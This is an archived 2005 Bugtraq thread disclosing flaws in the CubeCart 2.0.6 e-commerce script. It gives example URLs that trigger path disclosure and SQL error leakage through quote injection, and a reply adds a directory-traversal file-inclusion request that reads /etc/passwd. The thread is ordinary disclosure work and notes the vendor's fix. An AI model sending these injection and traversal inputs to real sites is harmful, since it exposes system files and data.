| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 6 Feb 2005 20:52:00 -0000 From: "John Cobb" <johnc@...ytes.com> To: "'Ravish Ahuja'" <ravish@...next.com>, <bugtraq@...urityfocus.com> Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hi Ravish, This only happens on older versions, it was fixed in 2.0.5. (see [NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities) The only other thing an attacker could do is to include a .php file somewhere else on the server. For example, if the attacker also had his/her website on that same server and knew the full path to it, they could use file inclusion to launch an 'evil' .php file from there home folder. Regards John www.NoBytes.com Web Design, Web Hosting, Hardware, Software, You Name it, if its to do with IT we can sort it. -----Original Message----- From: Ravish Ahuja [mailto:ravish@...next.com] Sent: 06 April 2005 20:44 To: 'John Cobb'; bugtraq@...urityfocus.com Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hello, http://www.victimsite.com/index.php?&language=f00bar.php Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php on line 147 This is path disclosure but it can also be used for malicious file include. http://www.victimsite.com/index.php?language=../../../../../etc/passwd Regards, Ravish http://www.xeonext.com -----Original Message----- From: John Cobb [mailto:johnc@...ytes.com] Sent: Sunday, February 06, 2005 11:09 PM To: bugtraq@...urityfocus.com Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hello All, I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6. Authors Site: http://www.cubecart.com CubeCart is described by its authors as: 'What is CubeCart? CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you have hosting supporting PHP and one MySQL database.' +-[Examples:]--------------------------------------------------+ [1]------------------------------------------------------------+ http://www.victimsite.com/index.php?&language=f00bar.php Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php on line 147 [2]------------------------------------------------------------+ http://www.victimsite.com/index.php?&PHPSESSID=' Warning: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0 [3]------------------------------------------------------------+ http://www.victimsite.com/tellafriend.php?&product=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/tellafriend.php on line 46 [4]------------------------------------------------------------+ http://www.victimsite.com/view_cart.php?add=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/view_cart.php on line 49 [5]------------------------------------------------------------+ http://www.victimsite.com/view_product.php?product=' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 53 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 63 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 144 +-[Notes:]-----------------------------------------------------+ Vulnerabilities found on: 05/03/2005 Author(s) Informed on: 05/03/2005 Author(s) Response: 05/03/2005 Author(s) Fix: 05/04/2005 Regards John Cobb JohnC@...ytes.com http://www.NoBytes.com
Powered by blists - more mailing lists